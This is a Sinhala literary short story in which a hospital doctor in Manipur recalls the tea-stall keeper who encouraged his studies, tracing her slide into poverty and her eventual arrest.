“ඒක හරි තාමෝ” සහායක වෛද්‍ය විනෝද් තහවුරු කළේය. “අපි ඊයේ මුළු දවසෙම ඔබතුමාව සම්බන්ධ කරගන්න උත්සාහ කළා. ඒත් දුරකථන ක්‍රියාකරු කිව්වේ සර් ගේ දුරකථන මාර්ගය කැඩිලයි කියලා”

“ඔව්. ඒ අපේ අම්මයි මගේ දරුවගේ අම්මයි තික්ෂණ බුද්ධිය යොදවල කරපු සැලැස්මක්. මගේ දරුවට බලපාල තියෙන අපල දුරු කරන්න යාගයක් කරන්න සූදානම් කර තිබුණා. ඒක උදේ පාන්දර ඉදල හිරු බැස යන තුරු පැවැත්වෙන එකක්. යාගය පවත්වන කාලය තුළ දී පවුලේ කිසි කෙනෙකුට පිටට යන්න බැහැ කියල ජ්‍යෙතිශඥයා කියල තියෙනවා. ඒක හරිම හිසරදයක්. මේ වගේ ඇදහිලි මම විශ්වාස නොකළත් මගේ දරුවගේ අම්මටත් මගේ අම්මටත් විරුද්ධ වෙන්න මට හැටියක් නැහැ”

හිසෙහි ඇති තුවාලය හැරෙන්නට වෙනත් තුවාලයක් රෝගියාට නොමැති බවට සාක්ෂි ඇත. ඇයගේ ශරීර උෂ්ණත්වය වැඩි වී ඇත.

හෙදිය අත තිබූ ඇද ඉහපත ගෙන බැලූ මම හදිසි රෝගීන් සදහා කරන ලද ප්‍රතිකාර දෙස බැලුවෙමි. පිටගැස්මට දෙන එන්නත, මැහුම් දැමීම, තුවාල වෙලීමට දෙන එන්නත ලබා දී ඇත. ප්‍රතිකාර ආරම්භ කිරීමට පෙර තුවාලයේ ස්වභාවය පරීක්ෂා කිරිමට සුදුසු බව මම කල්පනා කළෙමි. එබැවින් මගේ සහායක වෛද්‍යවරයා සහ හෙදිය ඇමතුවෙමි.

“වහාම ඇගේ හිසේ එක්ස් රේ ඡායාරූපයක් අවශ්‍යයි”

දෙදෙනම හිස් සැලූහ.

මේ අතර සරළ ඇදුමකින් සැරසුන තරුණ යුවතියක් ඇද පාමුල  සිටගෙන සිටිනු මම දුටුවෙමි. සමහරවිට මා ඇයව කොහේදී හෝ දැක ඇත.

“ටයිබුන්ගෝ මගේ අම්මගේ තත්ත්වය” ඇය නතර වූවාය. ඇගේ හඩේ අව්‍යාජ බව පැහැදිළිව දක්නට ලැබිණි.

“අපි උත්සාහ කරමු. අපට පුළුවන්‍ දෙයක් කරමු” මම සුපුරුදු පිළිතුරු දුනිමි.

මගේ කාමරයට ගිය මම ඇද ඉහපත පරීක්ෂා කළෙමි. එහෙත් මම රෝගියාගේ නම නොවිමසුවෙමි. එය දුටු විගසම මම ගොළුවිමි. නම ඉනේ ලෙයිපාකලෙයි - පදිංචිය - තංගමෙයිබාන්ද් - වයස 55 යි - මගේ මනස නැමැති නිල් ආකාශයේ තාරකාවක් දැල්වී ක්‍රමයෙන් දීප්තියෙන් බබලන්නට විය. ඒ ඇයද?

“නර්ස් අර තරුණියට කතා කරන්න” මම පෑන පැත්තකට දමමින් කලබලයෙන් කීවෙමි.

මදවේලාවක් අදිමදි කළ හෙදිය අනතුරුව පිටව ගියාය. මොහොතකින් ඇය යුවතියත් ඇදගෙන ආපසු පැමිණියාය. යුවතිය සැකයෙන් සහ බියෙන් යුතුව මා ඉදිරිපිට සිට ගත්තාය.

“ඉමෙම්මා ඔයාට සොයුරු සොයුරියො කී දෙනක් ඉන්නව ද?”

“අපි දෙන්නයි, මල්ලියි මායි” ඇය හිස පහත් කරගෙන පිළිතුරු දුන්නාය.

“ඔබගේ මල්ලිගෙ නම?”

“මංගලම්, එයා ජීවන් නමින් තමයි ප්‍රසිද්ධ” පැහැදිලිවම එම පිරිම ළමයාගේ නම ජීවන්. මම මද වේලාවක් සිතිවිලිවල ගිලෙමින් සිටියෙමි. පියවි තත්ත්වයට පිවිසි විගසම යුවතිය මා ඉදිරියේ සිටගෙන සිටිනු දුටුවෙමි.

“ඔයාට දැන් යන්න පුළුවන් ඉබෙම්මා” තවත් ප්‍රශ්න නොඅසාම මම ඇයට යාමට ඉඩ ඇරියෙමි.

ඇය පිටව ගිය පසු මම අවශ්‍ය සටහන් යොදා ඇද ඉහපත හෙදියට දුනිමි.

“මේක වහාම එක්ස් රේ දෙපාර්තමේන්තුවට යවන්න ඉක්මන් කරන්න”

“ඒත් ඩොක්ටර්” ඕ අදිමදි කලාය

“ඒත් මොකද?”

“ඊයෙ එක්ස්රේ ෆිල්ම් තිබුනෙ නැහැ. මට ඒ ගැන කියන්න අමතක වුනා”

මා තුළ කෝපයක් හට ගත්තේය. මේ රෝහලට සිදුව ඇත්තේ කුමක්ද? අද එක්ස්රේ ෆිල්ම් නැහැ. හෙට විදුලිය නැහැ. අනිත් දවසේ යන්ත්‍රය අබලන් කියයි. ඊටත් පස්සේ දවසේ?

“එක්ස්රේ ෆිල්ම් තිබුනත් නැතත් මට කමක් නැහැ. ඒ අයට කියන්න මේක කෙරෙන්නම ඕනයි කියලා”

ඊලග මොහොතේ මම ප්‍රකෘති තත්ත්වයට පත්විමි. රෝහලේ අඩුපාඩු සහ අවශ්‍යතා පිළිබද අසරණ හෙදියට කඩා පැන මගේ කෝපය සිට කරන්නේ ඇයි? ගිහින් බලන්න. මමකේන්ති ගත්තේ නර්ස් එක්ක නෙවෙයි. රෝහල් කළමනාකාරතිව්යේ ඉන්න කළමනාකරණ විශේෂඥයො කියල හිතාගෙන ඉන්න ලොකු මිනිස්සුත් එක්ක” මේ රෝගියා පිළිබද මගේ අති විශේෂ සැළකිල්ල දුටු වෛද්‍ය විනෝද් කුතුහලයට පත්විය.

“තමෝ ඔබතුමා දන්නවද මේ වයසක ගැහැණිය ගැන?” මා පිළිතුරු දීමට පෙර හෙදිය කතා කළා.

“සර්ගේ නෑදෑ කෙනෙක්ද?”

“හ්ම් නෑදෑයො හ්ම්”

මම එවකට ශිෂ්‍යයකු විමි.

අපේ පාසල අසළ පාර අයිනේ පිදුරු සෙවිළි කළ කුඩා තේ කඩයක් විය. වෙනත් තේ කඩ නොතිබූ බැවින් එය අප නිතර ආ ගිය තැනක් බවට පත්විය. සමහර අවස්ථාවල ගුරුවරු පවා එහි පැමිණියහ. තේ කඩය පවත්වාගෙන ගිය ඉනේ ලෙයිපාකලෙයි අප කාගේත් නැන්දා විය. ඉනේ නැන්දා. ඉනේ නැන්දා තුල කලාතුරකින් ඇතිවන ගුණාංග විය. ඇය කිසිවිටෙකත් කෝප නොවූවාය. සෑම ශිෂ්‍යයෙක්ම ඉන් ප්‍රයෝජන ලැබීය. බෙරු සහ පොකාරා ආහාරයට ගෙන තේ පානය කර පිටව යන අප ඉනේ නැන්දේ අපි වෙන දවසක ගෙවන්නම් යනුවෙන් පවසමු. ඇය එවිට මෙලෙස කියන්නීය. “ඔව් ඔව් අමතක කරන්න එපා කවුරුන් ණයට ගත්තාද? ණයට ගත්තේ මොනවාද? යන සියල්ල ඇගේ මතකයේ රැදී තිබිණ. ඇගේ කාරුණික භාවය නිසා බොහෝ සිසුහු මුදල් ගෙවූහ. ඇය තමාගේ දරුවන්ට මෙන් අපට දැනමුතුකම් දුන්නාය. අපරාධකාරයෝ වගේ හැසිරෙන්න එපා. හොදට ඉගෙන ගන්න. ස්වොත්සාහයෙන් දියුණු වෙන්න බලන්න. නරක ආශ්‍රයෙන් ඈත්වෙන්න. “කෙතරම් දගකාර ශිෂ්‍යයෙකු වුවුත් ඇය ඉදිරියේ සුවච කීකරු ළමයෙක් බවට පත්වෙන්නේය.

මානිපූර් දේශපාලන බල අරගලය ඉතා බලවත්ව පැවති කාලයයි ඒ. ප්‍රචාරක කටයුතු නිසා අප වැනි ශිෂ්‍ය නායකයන්ට සිරබාරයට පත්වීමට ද සිදුවිය. අපව මුදා හැරි විගසම ඉනේ නැන්දා මෙස් පැවසුවාය. “ළමයිනේ ඔබලා දේශපාලනය කළාට කමක් නැහැ. ඒත් අධ්‍යාපන කටයුතු අතපසු කරන්න එපා. හොදට ඉගෙන ගන්න. දේශපාලනය විතරක් කළොත් නුඹලාට කවුරුවත් ගරු කරන්නේ නැහැ”

“ඇගේ කුඩා පුත්‍රයා කලාතුරකින් තේ කඩයට පැමිණෙයි. ඒ අවස්ථාවල මෙසේ කීවාය. ඔබලා හිතනවද මගෙ පුතා ඉගෙන ගන්න හොදයි කියලා. මම බඩගින්නේ හිටියත් මට අවශ්‍ය පුතාට ඉහළටම උගන්වන්න.”

තම වයසට වඩා මේරූ කුඩා දරුවාට තම පාඨ ග්‍රන්ථවල කවි කටපාඩමින් කියවිය හැකිවිය. හේ අප ඉදිරියේ එම කවි අපූරුවට ගායනා කළේය. ප්‍රියමනාප දරුවෙක් වූ ඔහු පිළිබද අපි සියල්ලෝම දැන සිටියෙමු. තමාට දියණියක් ද සිටින බව ඉනේ නැන්දා අප සමග කීවාය. ඇය ඉගෙනුම ලබමින් සිටින්නීය. එහෙත් අපි ඇයව තේ කඩයේ දී කිසිදිනක නොදුටුවෙමු.

අපේ මැට්‍රිකියුලේෂන් විභාගය සම්පූර්ණ කිරීමෙන් බොහෝ කලකට පසුද අප සහ ඉනේ නැන්දා අතර වූ බැදිම කඩා දැමිය නොහැකිවිය. නිතරම අපි එක්ව ඇගේ තේ කඩය වෙත ගියෙමු. අපි එහිදී පොකාරා පිගානක් අනුභව කොට තේ කෝප්පයක් තොලගාමින් පැය ගණන් ගත කළෙමු.

විශ්වවිද්‍යාල ප්‍රවේශ ප්‍රතිඵල අප අතර දුෂ්කර ගැටලු මතු කළේය. මා අපේක්ෂා කළ ප්‍රමාණයටත් වඩා සාර්ථක ප්‍රතිඵල මට ලැබී තිබිණි. වෛද්‍ය විද්‍යාව හෝ ඉංජිනේරු විද්‍යාව හැදෑරීම තෝරා ගැනීමට මට අවස්ථාව ලැබිණි. මගේ දෙමාපියන්ගේ කැමැත්ත වූයේ දෙවැන්නටය. එවිට මට මගේම මෝටර් රථයක් සහ ගොඩනැගිල්ලක් ඉදි කර ගත හැකිය. එහෙත් මගේ දේශපාලන අරමුණ ඊට වඩා ගැඹුරු විය. මට අවශ්‍ය වූයේ නීතිඥයකු හේ කථිකාචාර්යවරයකු වීමටයි. මේ දෙකින් එකක්වත් මගේ දේශපාලන අරමුණවලට බාධාවක් නොවේ.

එක් දිනක ‍තේ පානය කරමින් සිටිය දී මම මගේ ගැටලුව ඉනේ නැන්දාට කීවෙමි. ඇය සරල විසදුමක් සතුටින් ඉදිරිපත් කළාය. “අපි ලොතරැයියක් අදිමු. ඒ අනුව තෝරා ගනිමු. එකගද?”

“ අපූරු අදහසක්” අනතුරුව ලොතරැයියෙන් මා අකමැති දෙකෙන් එකක් ජයග්‍රහණය කළේය. මට වෛද්‍ය විද්‍යාව තෝරා ගැනීමට සිදුවීම තමා ලත් ජයග්‍රහණයක් ලෙස සළකමින් ඉනේ නැන්දා සතුටුවූවාය. “මම ප්‍රාර්ථනා කළ විදියටම සිද්ධ වුනා. වෛද්‍ය වෘත්තිය තමයි ඉතා හොද රෝගීන්ට සහ අසරණයන්ට සේවය කරන්න පුළවන් ඕ කීවාය.

මගේ සිත් වේදනාව දකිමින් ඕ හේතු දැක්වූවාය. “මෝඩ ළමයෝ දේශපාලනය තියෙන්නේ ධනවත් සමෘදිධිමත් අයට. ඔබ දුප්පත් මිනිහෙක්ගෙ පුත්‍රයෙක්. දේශපාලනයට යොමුවෙලා බඩගින්නෙ මියැදෙන්න ද කල්පනාව” මා දෙස තත්ත්පර කීපයක් කෙළින් බලා සිටි ඕ දිගටම කියාගෙන ගියාය. “හොදයි ඔබ දේශපාලනයට සම්බන්ධවුවත් වෛද්‍යවරයකුවීම ඊට බාධාවක් නෙවෙයි. ඔබට රජයේ රස්සාවක් හොයන්න අවශ්‍ය නැහැ. ගෙදරදීම රෝගීන්ට ප්‍රතිකාර කරන්න පුළුවන්. ඔබට කවදාවත් බඩගින්නෙ ඉන්න වෙන්නෙ නැහැ.”

ඉනේ ලෙයිපාකලෙයි ගේ දිරිගැන්වීම මත මම වෛද්‍ය විද්‍යාව ඉගෙනීමට ගියෙමි.

ග්‍රීෂ්ම නිවාඩුවට මම ගෙදර ගිය විගසම ඉනේ ලෙයිපාකලෙයි ගේ තේ කඩය වෙත ගියෙමි. නගරයේ එම ප්‍රදේශයේ අලුත් ගොඩනැගිලි ඉදිවීමත් සමග සීග්‍රයෙන් වෙනස් වෙමින් පැවතිණ. ඉනේ නැන්දාගේ තේ කඩය බොහෝ සේ වෙනස් වී ඇත. කෙසේ වෙතත් මේ වෙනස බොහෝ අයගේ යහපතට හේතු වුවත් ඇගේ පැත්තෙන් එසේ නොවීය. ජරාවාසවූ තේ කඩය දැකීමෙන් මම කම්පනයට පත්විමි. බංකු කිලිටි සහ දූවිලි පිරුණු ඒවා විය. පාරිභෝගිකයන් ක්‍රමයෙන් අඩුවෙන බව පෙන්නුම් කරමින් අහුමුළුවල මකුළු දැල් බැදී තිබිණ. ඉනේ නැන්දා තේ කඩය පිරිසිදුව තබා ගැනීමට උනන්දු නොවන බව පැහැදිලිය.

“මේ මොකද? ඉනේ නැන්දෙ?” තේ කඩයතුලට පියවර තබමින් මම විමසුවෙමි. “මොනව කරන්නද? මේ කාලෙ කැරකෙන හැටි. කාටද ඊට විරුද්ධ වෙන්න පුළුවන්.”  පාර අනිත් පැත්තේ ඇති යෝධ ගොඩනැගිල්ල පෙන්වමින් ඇය කීවාය. යෝධ ගොඩනැගිල්ලේ නාම පුවරුවේ ඇති වචන ඈතට දිස්වේ.

නවීන ආපන ශාලාව සහ හෝටලය, ඉනේ නැන්දාගේ තේ කඩය මෙතරම් ඉක්මනින් පරිහානියට පත්වූයේ ඇයි ද යන්න මට වටහා ගත හැකිවිය.

ඊලග ග්‍රීෂ්ම නිවාඩුවේදී තේ කඩය නැරඹීමට යාමට මම අවස්ථාවක් සලසා ගතිමි. මෙවර ඉනේ නැන්දා සහ ඇගේ පුතා දහදිය පෙරාගෙන තේ කඩය කඩා බිද දමනු දක්නට ලැබිණි. ඒ වන විට ජිවන් ගැටවර වියේ පසුවූ තරුණයෙකු විය.

මා දුටු ඕ වැඩ නතර කර ඉදිරියට ආවාය. “ඉබුන්ගො කවදද ගෙදර ආවෙ?”

ඇය හදිසියේම මහලු වී ඇති බව මට පෙනි‍ණි. සුපුරුදු කාන්තිය විහිදුවන සිනාවේ සළකුණකුදු නොවීය.

තේ කඩේ අලුතින් හදනවද? ඉනේ නැන්දේ. මේ පාර වඩා හොදට එකක් හදන්න. මම යහපත් ප්‍රාර්ථනයකින් යුතුව උපදෙස් දුනිමි.

“ඒක කොයිතරම් දුරට ඇත්තවෙයිද? ඉබුන්ගෝ ඉනේ නැන්දා පැවසුවාය. ඔහෙට ආරංචි නැද්ද මට මේ ඉඩමෙන් පිටවෙන්න කියපු ආරංචිය. ඒකයි මේ තේ කඩය කඩල බිදල දමන්නෙ”

“ඒත් ඇයි?”

එහෙනම් ඔහෙ දන්නේ නැහැ. ඉබුන්ගෝ. ආණ්ඩුව කියනව නගරය අලංකාර ලෙස සංවර්ධනය කරන්න ඕනලු. ඒ නිසා ඒ අය පාර අයිනෙ තියෙන සේරම ඉඩම් කට්ටි සාප්පු දමන්න පුළුවන් අයට බෙදල දීල. ඒකයි අපට මේ ඉඩමෙන් පිටවෙන්න සිද්ධවුනේ.

වරක් නීතිඥයන් පිරිසක් සමග සිටිය දී මට අසන්නට ලැබුන කරුණු කීපයක් මම ඉනේ නැන්දාට කීවෙමි. “ඇයි ඉනේ නැන්දා  ඉඩම් කෑල්ලක් අල්ලගන්නේ නැත්තෙ. අවුරුදු දහයක් පහළොවක් හිටපු ඉඩමට අයිතිවාසිකම් කියන්න නැන්දට සම්පූර්ණ අයිතිය තියෙනවා මේ ඉඩමට වෙන කාටවත් එච්චර අයිතියික් නැහැ”

මගේ අවුරුදු දහය පහළොව අමතක කරල දාන්න ඔහෙ දන්නවද? ඉනම්මා ඉබේචා, පසුගිය අවුරුදු විස්සක් විසිපහක් විතර කාලක් නුග ගහ මුල හිටපු ඉනම්මා ඉබචා. ඇයවත් එතනින් එලවල දමලා. ඒක එහෙම තමයි බෙන්ගෝ. ඒ අයගේ ප්‍රාර්ථනාව දුප්පත්කම තුරන් කිරීමලු. මද විරාමයකින් පසු ඕ නැවතත් කතා කළාය. රුපියල් දහදහසක් දෙනවයි කියනවා. කල්පනා කරල බලන්න දහදාහක්.” දිග සුසුමක් ඇගේ තොලගින් ගිලිහිණි. ඉනේ ලෙයිපාකලෙයිට සිදුව ඇති පීඩාව වෙනුවෙන් සුසුම් හෙලීම හැරන්නට මට කළ හැකි කිසිවක් නොවීය. මේ රජයේ සංවර්ධන වැඩවල ස්වභාවයයි. දුප්පත්කම තුරන්කරලීමේ වැඩවල ස්වභාවයයි.

සතියකට හෝ දෙකකට පමණ පසු ඉනේ නැන්දා පාඕනා කඩවීදියේ සමුපකාර තොග ගබඩාව ඉදිරියේ අනෙක් කාන්තාවන් සහ ළමයින් සමග පෝලිමේ සිටිනු මම දුටුවෙමි.

හිරි පොද වැටේ. එහෙත් ඒ පිළිබද කිසවෙක් නොතකති. රජයේ පාලන මිලට සීනි කිලෝ එකක් හෝ දෙකක් ලබා ගැනීම සදහා ගෙන යන නොනවතින අරගලයයි ඒ. ඔවුන්ගේ පෝලිම වැස්සට කඩා දැමිය නොහැකිවා‍ මෙන්ම දැඩි හිරු රැස්වලටද නතර කළ නොහැකි ය. හැන්දෑව හතර පහ වන විට ඔව්හු තමන් ලබාගත් සීනි කිලෝ කිහිපය විශාල සාප්පු හෝ වෙළදුන්ට විකුණා රුපියල් කිහිපයක ලාභයක් ලබති. අනතුරුව රුපියල් දෙක තුනක සහල් මිලිට ගෙන රාත්‍රිය ගත කිරිමට නිවෙස් බලා යති.

මගේ නිවාඩුව අවසානයේ එක්දිනක් මට ඉනේ නැන්දා මහපාරේ දී මුණ ගැසිණි. ඇය හිස මත පෙට්ටියක් තබාගෙන යයි. බයිසිකලය නතර කළ මම ඇය සමග කතා කළෙමි.

“ඉනේ නැන්දේ මොනවද උස්සගෙන යන්නේ?”

ඕ නතර වූවාය. “හා මේ ඔහෙද? මම මේ හිස් බෝතල් එකතු කරනවා ඒත් ඔහෙ කොහෙද ගියෙ?

මා වෙත එල්ල කළ ප්‍රශ්නයට පිළිතුරු නොදී මම ඇගේ තොරතුරු විමසීමට උනන්දුවිමි.

“සීනි ගන්න සමුපකාරෙට යන එක නතර කළා ද?” මම විමසුවෙමු.

“නැහැ ඉබුන්ගෝ. මං වගෙ නාකි ගෑණියෙකුට ඒක කරන්න පුළුවන් වැඩක් නෙවෙයි. ඒක තරුණ ගෑනුන්ගෙ වැඩක්”

මට වටහාගත හැකිවිය. සීනි සළාක ක්‍රමයට බෙදා හැරීමේදී සිදුවන අක්‍රමිකතා සහ අයථා ගනුදෙනු පිළිබද මිනිසුන් අතර කෙරෙන කතා බහ සහ ඒ පිළිබද පුවත්පත්වල පළවූ වාර්තා ද මගේ මතකයට නැගිණි. එහෙත් මෙහි ඇති අවාසනාවන්ත තත්ත්වය එම මහජන පැමිණිලිවල රජය කන්දිය යුතු වුවත් ඔවුන් නෑසූ කනින් සිටීමයි. අප කතා කරමින් සිටින අතර කොහේදෝ සිට පැමිණි මෝටර් සයිකලයක් ඉනේ නැන්දාගේ ඇගේ ගෑවෙමින් නොගෑවෙමින් පසුකර ගියේය. වාසානාවකට මෙන් මම ඇයව අල්ලාගත් බැවින් ඇයට කරදරයක් නොවීය. එහෙත් ඇය එකතු කර තිබූ බෝතල් සියල්ල කුඩු පට්ටම් වී කොන්ක්‍රීට් පාරේ විසිර ගොස් ඇත. මෝටර් බයිසිකලයේ ගමන් කළ තරුණයෝ තිදෙනා ආපසු හැරී බැලීමටවත් උනන්දුවක් නොදක්වා  පැමිණි වේගයෙන්ම යන්නට ගියහ. කෝපය සහ අසරණකමමට ද දැනිණ. එම තරුණයන්ගේ අප නොදන්නා දෙමාපියන්ට සාප කරමින් අසභ්‍ය වචනයෙන් බැන වැදීම හැරෙන්නට මට කල හැකි දෙයක් නොවීය. ඉනේ නැන්දාට ඇගේ මූල ධනයත් ලාභයත් දෙකම අහිමිවිය.

එම සිද්ධියෙන් පසු බොහෝ කාලයක්ම මට ඉනේ නැන්දා හමුනොවීය. එහෙත් මීට වසර ගණනාවකට පෙර මා ශල්‍ය වෛද්‍ය විද්‍යාව හැදීරීම සදහා පිටරට යාමට සූදානමින් සිටි අවස්ථාවක මට අහම්බෙන් ඇය මුණ ගැසිණ. ඒ අවස්ථාවේ ඇය ලම්පාල් වෛද්‍ය විද්‍යලායේ අලුතින් ඉදිකරන ගොඩනැගිලි පරිශ්‍රයේ ගල් ඇදීමේ කම්කරු ලියක ලෙස සේවය කරමින් සිටියාය. මට ක්වරම ඇයව හදුනාගත නොහැකි විය. ඇය බෙහෙවින් වෙනස් වී ඇත. ඇගේ කම්මුල් වල ගැසී ඇති මුහුණ රැලි වැටී ඇත.

යුරෝපීය ඇදුම් කට්ටලයකින් සැරසී කර පටියක් ද පැළද සිටින මා දැක්මෙන් ඇය තිගැස්සිණි. මා හදුනාගත් විගස ඇය දුබල සිනාවක් පාමින් කතා කළාය. “ඔව් ඒ මම තමයි. ඔහෙ ඉබුන්ගෝ, දැන් වැඩ කරනවද?”

“ඔව් මට රස්සාවක් ලැබුනා මෙහෙ”

“මට හරිම සතුටුයි. ඔහෙ මෙහෙ වැඩ කරන නිසා මට අසනීපයක් වුවත් බයක් නැහැ. ඇත්තටම මට හරි සතුටුයි”

ඇගේ මුහුණ ආලෝකමත් වූ අතර බොහෝ කලකට පසු කෙටි වෙලාවකට හෝ ඇය සතුටුවනු පෙනිණි.

එක්ස් රේ ඡායාරූපය මගේ සැකය තහවුරු කළේය. මහජන කෝපයට හේතුවන පරිදි තුවාල තුළ ගල් සහ වීදුරු කැබලි තිබිය දී මැහුම් දමා ඇති වෛද්‍යවරු මේ අන්දමින් නොසැළකිල්ලෙන් කටයුතු කර ඇති ප්‍රථම අවස්ථාව මෙය නොවේ. වෛද්‍යවරු වන අපි අමුතුම කොටසක් වෙමු. අසනීපයෙන් පසුවන සහ තුවාල ලබන අය අචේතනික වස්තූන් ලෙස සලකන්නේ ඇයි?

මම වහාම ඉනේ නැන්දාව ශල්‍යාගාරය තුළට ගතිමි. මම මැහුම් කපා තුවාලය නැවත විවෘත කළෙමි. කුඩා ගල් කැබලි දෙකක් ඉවතට ගෙන යළි මැහුම් දැමුවෙමි.

මට ඇය ගැන කණගාටුවක් ඇතිවිය. පෙළපාලිකරුවන් සහ පොලීසිය අතර වූ ගැටුමේදී මේ අහිංසක කාන්තාව තුවාල ලබා ඇත.

ඇය ටෙරිමාල් මෙරිලාල් ඉදිකිරීම් වැඩ බිමේ සේවය කරමින් සිටින්නට ඇත. එම අවස්ථාවේ කලබල ඇතිවූ බව වටහාගෙන එම ස්ථානයෙන් පලා නොගියේ ඇයි? ඇයට ඒ සදහා ප්‍රමාණවත් කාලයක් නොතිබිණි ද?

ඉනේ නැන්දා කෙරෙහි මා දැක්වූ දැඩි උනන්දුව නිසා අනෙකුත් වෛද්‍යවරු සහ‍ හෙදියන් ද ඇයට ප්‍රතිකාර කිරීමට උනන්දු වූහ. ඔව්හු ඇයට ලබාදීමට වැඩි වටිනාකමින් යුත් බෙහෙත් වර්ග සොයා දුන්හ. සමාන්‍යයෙන් වෛද්‍යවරු එවැනි බෙහෙත් වර්ග රෝහලේ නැති බව අනෙක් රෝගීන්ට පවසති. මේ සාමූහික ප්‍රයත්නය නිසා ඉනේ නැන්දා ඉක්මනින් සුවපත් විය.

ඇයට කතා කිරිමට හැකි තරම් සුවපත් වූ පසු මම ඇයට මෙලෙස කීවෙමි.

“මීට පස්සේ පෙළපාලියක සද්දේ ඇහෙනකොට එතනින් පැනල දුවන්න”

“ඇයි?”

ඇය මවිතයෙන් විමසුවාය.

ඔල්මාදංකාරයො පෙළපාලියෙ යනවා. ඔබලා වගේ අහිංසක මිනිස්සු අමාරුවෙ වැටෙනවා.

ඔබතුමාල වගේ අයට ඈත්වෙලා ඉන්න පුළුවන්. ඒත් අපට බැහැ. මටත් පෙළපාලියට සම්බන්ධවෙලා ඉදිරියට යන්න සිද්ධ වුනා. මේ වෙස්වන තත්ත්වය හමුවේ අපට ජීවත්වෙන්න ක්‍රමයක් නැහැ. භාණ්ඩ මිල රොකට් එකක වේගෙන් ඉහළ යනවා. ජිවත්වෙන්න තියෙන ක්‍රම සීමාවෙලා. කාගෙ හරි සපත්තු ලොවකෑව නම් අපටත් රුපියල් පන්දහක් දහදහක් හම්බ කර ගත්ත හැකි. දුප්පත් අපි ජීවත්වෙන්නේ කොහොම ද? බඩගින්න මරණය නම් අපිත් ඒ පෙළපාලියට එකතුවෙනවා.”

ඉනේ නැන්දාගේ වචන අපේක්ෂා භංගත්වයට පත්වූ කෙනකුගේ හඩකි. ඇගේ කටහඩ වරින්වර බිදෙන්නට විය. එතරම් බරපතල කාරණා ඉනේ නැන්දා සරල අන්දමින් විස්තර කරන අයුරු දැක මම මවිත විමි. ඇය කෙතරම් වෙනස්වී සිටි ද? එය සිදුවූයේ කෙසේ ද?

මාතෘකාව වෙනස් කිරීමේ අරමුණින් මම ඇගෙන් මෙලෙස විමසුවෙමි. “මම දැක්කෙ නැහැ ජීවන් ඔබව බලන්න එකපාරක්වත් ආවා? එයා කොහෙද?”

“හිරගෙදර එදා සිද්ධියට හිරේට ගත්ත අය අතර එයත් එක්කෙනක්”

ඇය කිසිදු කණගාටුවකින් තොරව ඒ වෙනුවට ආඩම්බරයකින් යුතුව කීවාය.

“එයා අධ්‍යාපනය නතර කෙරුවද?”

“ඇති වැඩේ මොකක්ද? බොහොම දුක් විදල සමහර දවස්වල බඩගින්නේ ඉදල බී ඒ උපාධිය නම් සම්පූර්ණ කළා.  අවුරුදු තුන හතරක් ම පුංචි රස්සාවක්වත් හොයා ගන්න උත්සාහ කළා. ඇමැතිවරුන්ට දොළ පිදේනි දෙන්නේ නැතිව කිසිම වැඩක් කරගන්න බැහැ. පන්දාහ දහදාහ දෙන්න ඕනි. මම කොහෙන්ද සල්ලි හොයන්නේ ඇය හිස සොලවමින් දිගටම කතා කළාය. ඔහෙ දන්නවද මේ ආණ්ඩුව තියෙන්නේ ධනවතුන්ට, ධනවතුන්ගේ දේපල ආරක්ෂා කරන්න ධනවතුන්ට තව තවත් හම්බකරගන්න ඉඩ සලස්වන්න. ඒත් ඒක හුග කලක් පවතින එකක් නැහැ. දුප්පත් මහජනතාව නැගි සිටීවි.  ඒ දවස වැඩි ඈතක නෙවෙයි. එය ප්‍රත්‍යක්ෂව පෙනිණි. ග්‍රීෂ්ම සෘතුවේ දැඩි උණුසුම නොතකා ලෙයිපාකලෙයි මල් පිපෙනු ඇත. තවදුරටත් ඔවුන්ව පාගාගෙන සිටීමට නොහැකිවනු ඇත. එය හෙට විය හැකිය. ඊට පසුදිනක විය හැකිය. එහෙත් එය පෙති විහිදා පුබුදනු ඇත.

“ඩොක්ටර්  කෝල් එකක්”

හෙදිය මා වෙත පැමිණ කීවාය අඩනින්දේ සිහින දකිමින් සිටි මම දුරකථනය වෙත ගොස් එය ගතිමි.

වෛද්‍ය අධිකාරිවරයා ඔහු හමුවට පැමිණෙන ලෙස මට දැන්විය.

මම ඔහුගේ කාමරයට ගියෙමි. පොලිස් නිලධාරියෙකු අසුන් ගෙන සිටි මා වාඩිගත් විගසම වෛද්‍ය අධිකාරිවරයා මා ඇමතුවේය.

“ඩොක්ටර්ගේ වාට්ටුවේ ඉන්න ඉනේ ලෙයිපාකලෙයි කියන ලෙඩාව නිදහස් කරන්න පුලුවන්ද?”

“ඒත් ඇය තවත් දවස් කීපයක් හිටියොත් හොදයි සර්. ඇයට ශක්තිය ලැබෙන තුරු” මම අහිංසක ලෙස කීවෙමි.

“අපි ඇයව නිදහස් කරමු. ඇයට විරුද්ධව වරෙන්තුවක් තියෙනවා. මේ ඇවිත් ඉන්නෙ පොලිසියෙන්” පොලිස් නිලධාරියා මා වෙත හැරුණි.

“මං හිතන්නෙ ඇය තවත් දවස් කීපයක් රෝහලේ හිටියොත් හොදයි” මම විරුද්ධත්වය පළකළෙමි.

ඇයට චෝදනා රාශියක් තියෙනවා. බලහත්කාරයෙන් ඇතුළුවීම, මංකොල්ල කෑම, දේපල ගිනි තැබීම, කුමන්ත්‍රණය කිරීම, බලහත්කාරයන් ඇතුළුවීම, මංකොල්ල කෑම, දේපල ගිනි තැබීම, කුමන්ත්‍රණය කිරීම, ඉනේ ලෙයිපාකලෙයිට එරෙහිව? මොන තරම් දරුණු විහිළුවක්ද?

මේ නීතිය පිළිබද ගැටළුවක් වෛද්‍ය අධිකාරිවරයා පැවසුවේ මුළු රටේම නීතිය සහ සාමය පවත්වාගෙන යාමේ වගකීම තමා සතුව පවතින්නාක් මෙනි. “පොලිසියෙන් අද අනිත් ලෙඩ්ඩු දෙන්නවම ගෙනියනවා”

කලින්ම තීරණයක් ගෙන ඇති බව මට පෙනී ගියේය. රෝගියාව මුදා හැරීමට මා කෙතරම් විරුද්ධ වුවත් මගේ ප්‍රධානියා ඔහුගේ උසස්වීම ලබා ගැනීමට අමාත්‍යවරයාගේ ප්‍රසාදය දිනාගැනීම සදහා පොලීසියේ උපදෙස් ඉටු කරනු ඇත. මම මගේ හෘද සාක්ෂියට එරෙහිව රෝගියා මුදා හැරීමේ ලියිවිලිවලට අත්සන් කළෙමි.

